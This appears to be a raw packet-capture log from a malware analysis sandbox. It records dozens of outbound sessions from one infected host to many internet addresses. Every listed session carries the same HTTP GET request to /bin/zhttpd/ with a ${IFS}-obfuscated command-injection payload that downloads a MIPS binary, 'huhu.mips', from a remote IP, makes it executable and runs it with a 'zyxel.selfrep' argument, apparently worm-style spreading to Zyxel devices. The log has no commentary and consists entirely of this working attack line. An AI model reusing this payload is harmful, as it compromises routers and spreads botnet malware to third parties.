                                                Jan 29, 2024 07:07:44.238456964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3406192.168.2.234012832.161.157.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238487959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3407192.168.2.2349500208.84.143.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238548040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3408192.168.2.2357066106.103.221.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238568068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3409192.168.2.2341514113.143.155.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238610983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3410192.168.2.2349944166.245.189.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238655090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3411192.168.2.235798864.134.220.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238673925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3412192.168.2.23365349.209.151.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238739967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3413192.168.2.2333982120.120.173.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238765955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3414192.168.2.235265459.46.96.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238822937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3415192.168.2.2347690174.207.119.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238853931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3416192.168.2.2347474101.115.255.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238879919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3417192.168.2.234342458.230.218.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238914013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3418192.168.2.235195466.92.182.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.238965988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3419192.168.2.2337080103.34.251.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239001036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3420192.168.2.2342762132.26.237.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239052057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3421192.168.2.235535444.206.147.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239072084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3422192.168.2.234063648.73.194.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239100933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3423192.168.2.235616040.82.240.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239156961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3424192.168.2.2358714149.28.228.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239214897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3425192.168.2.2343190114.213.159.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239250898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3426192.168.2.235220873.253.147.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239299059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3427192.168.2.2336890119.107.14.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239332914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3428192.168.2.235155852.15.43.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239363909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3429192.168.2.2350468193.154.65.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239401102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3430192.168.2.2358650143.104.235.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239424944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3431192.168.2.235792239.217.206.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239461899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3432192.168.2.234979665.161.7.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239495039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3433192.168.2.233701674.50.194.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239531994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3434192.168.2.2335626147.130.42.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239583969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3435192.168.2.2355266115.164.254.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239609957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3436192.168.2.235505217.115.197.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239650011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3437192.168.2.2359980199.128.89.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239689112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3438192.168.2.233361642.190.87.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239741087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3439192.168.2.2341794152.57.57.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239772081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3440192.168.2.2341308119.80.116.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239816904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3441192.168.2.2338376104.192.189.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239850998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3442192.168.2.2344924154.50.212.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239880085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3443192.168.2.2355962124.205.209.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239914894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3444192.168.2.2333720178.163.91.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.239957094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3445192.168.2.2350260148.246.230.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240014076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3446192.168.2.235122461.22.163.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240051031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3447192.168.2.235532475.99.192.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240070105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3448192.168.2.234975061.65.240.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240108013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3449192.168.2.234495413.183.200.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240154028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3450192.168.2.235444068.199.173.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240187883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3451192.168.2.235418432.229.230.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240216970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3452192.168.2.233673852.178.142.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240286112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3453192.168.2.234064275.32.17.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240335941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3454192.168.2.2336072111.50.9.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240354061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3455192.168.2.2337928195.78.40.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240381002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3456192.168.2.2337266205.7.140.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240432024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3457192.168.2.2341120187.183.181.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.240461111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3458192.168.2.23434484.104.6.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244105101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3459192.168.2.235382068.224.24.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244122982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3460192.168.2.2355352205.26.193.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244184971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3461192.168.2.2353760169.173.123.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244204044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3462192.168.2.23356968.174.138.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244268894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3463192.168.2.2348570155.192.98.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244306087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3464192.168.2.234193837.6.85.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244354963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3465192.168.2.2343264204.128.87.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244386911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3466192.168.2.2337114172.172.69.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244416952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3467192.168.2.2346906223.244.76.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244484901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3468192.168.2.233483013.125.5.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244513035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3469192.168.2.2351432148.87.118.47443
                                                TimestampBytes transferredDirectionData
